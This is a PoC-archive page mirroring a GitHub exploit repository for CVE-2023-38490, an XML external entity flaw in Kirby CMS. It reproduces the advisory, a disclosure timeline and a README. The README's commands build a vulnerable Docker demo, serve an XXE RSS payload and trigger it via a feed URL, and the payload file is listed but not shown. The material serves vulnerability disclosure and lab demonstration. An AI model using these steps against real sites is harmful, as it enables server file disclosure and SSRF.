Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-38490 PoC — Kirby XML External Entity (XXE) vulnerability in the XML data handler

Source
https://github.com/Acceis/exploit-CVE-2023-38490
Associated Vulnerability
Title:Kirby XML External Entity (XXE) vulnerability in the XML data handler (CVE-2023-38490)
Description:Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods. XML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF). Kirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected. The problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.
Description
Kirby < 3.9.6 XML External Entity exploit
Readme
# Kirby XML External Entity (XXE) - CVE-2023-38490 exploit

> Kirby < 3.9.6 XML External Entity

Exploit for [CVE-2023-38490](https://nvd.nist.gov/vuln/detail/CVE-2023-38490) / [GHSA-q386-w6fg-gmgp](https://github.com/getkirby/kirby/security/advisories/GHSA-q386-w6fg-gmgp).

## Exploitation demonstration

Build and run the vulnerable demo app:

```bash
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
```

Serve the demo payload:

Note: choose a bind address that the docker container can access.

```bash
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
```

Trigger the exploit:

```bash
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
```

## How, and why does it work?

The vulnerable function is present in Kirby Core but is not used by default in Kirby Core, Kirby StarterKit, or Kirby PlainKit. It means the vulnerability won't affect you on default configuration but could be introduced with custom development or by installing a plugin using the impacted toolkit.

For more details, read the dedicated article ([EN 🇬🇧](https://www.acceis.fr/kirby-3-9-6-xml-external-entity-xxe-vulnerability-cve-2023-38490) or [FR 🇫🇷](https://www.acceis.fr/vulnerabilite-kirby-3-9-6-xml-external-entity-xxe-cve-2023-38490)).

## References

- Target software: Kirby
  - Homepage / Vendor: https://getkirby.com/
  - Source code:
    - Core: https://github.com/getkirby/kirby
    - StarterKit (sample site): https://github.com/getkirby/starterkit
    - PlainKit (minimal setup): https://github.com/getkirby/plainkit
  - Vulnerable versions:
    - <= 3.5.8.2
    - 3.6.0-3.6.6.2
    - 3.7.0-3.7.5.1
    - 3.8.0-3.8.4
    - 3.9.0-3.9.5
  - Patched versions:
    - 3.5.8.3+
    - 3.6.6.3+
    - 3.7.5.2+
    - 3.8.4.1+
    - 3.9.6+
  - Patches:
    - 3.5-3.7: [4b2c454](https://github.com/getkirby/kirby/commit/4b2c454039c27e87e7dbda4a52afdbc012e57efd)
    - 3.8-3.9: [277b056](https://github.com/getkirby/kirby/commit/277b05662d2b67386f0a0f18323cf68b30e86387)
  - Advisories:
    - [Github](https://github.com/getkirby/kirby/security/advisories/GHSA-q386-w6fg-gmgp)
    - [OpenCVE](https://www.opencve.io/cve/CVE-2023-38490)
    - [AttackerKB](https://attackerkb.com/topics/NCH1phjOzC/cve-2023-38490)

## Timeline

- Week 24 - Mon, 12 Jun 2023: Vulnerability discovered by Alexandre ZANNI ([@noraj](https://pwn.by/noraj/)), Penetration Testing Engineer at [ACCEIS](https://www.acceis.fr/).
- Week 24 - Tue, 13 Jun 2023: Vulnerability reported to the editor (Kirby) by Alexandre ZANNI
- Week 24 - Wed, 14 Jun 2023: Proof of Concept shared with the editor (Kirby) from Alexandre ZANNI
- Week 24 - Wed, 14 Jun 2023: RFC 9116 [security.txt](https://getkirby.com/security.txt) added to getkirby.com
- Week 24 - Thu, 15 Jun 2023: Vulnerability confirmed by the editor (Kirby)
- Week 24 - Thu, 15 Jun 2023: Release fixes and patches planned
- Week 26 - Thu, 29 Jun 2023: Vulnerability independently discovered by Patrick FALB ([@dapatrese](https://github.com/dapatrese)) at [FORMER 03](https://former03.de/).
- Week 28 - Sun, 16 Jul 2023: Creation of a private GitHub advisory
- Week 29 - Sun, 23 Jul 2023: CVE ID requested
- Week 29 - Sun, 23 Jul 2023: Vulnerability patched by the editor (Kirby)
- Week 30 - Mon, 24 Jul 2023: Alexandre ZANNI invited to the private advisory by the editor (Kirby)
- Week 30 - Mon, 24 Jul 2023: Preparation of a vulnerable demo docker container by Alexandre ZANNI
- Week 30 - Mon, 24 Jul 2023: CVE ID CVE-2023-38490 registered (reserved) 
- Week 30 - Thu, 27 Jul 2023: Public release of the Github advisory and patches

## Disclaimer

ACCEIS does not promote or encourage any illegal activity, all content provided by this repository is meant for research, educational, and threat detection purpose only.
File Snapshot

 [4.0K]  /data/pocs/405ec3d7a55d66f8530f97a9b4e309fce208082d
├── [4.0K]  docker
│   ├── [ 251]  default.conf
│   ├── [1.8K]  Dockerfile
│   ├── [ 657]  feeditem-template.php
│   ├── [1.7K]  rssfeed-model.php
│   ├── [ 497]  rssfeed-template.php
│   └── [  80]  rssfeed.txt
├── [4.0K]  payload
│   └── [269K]  xxe.rss
└── [3.8K]  README.md

2 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →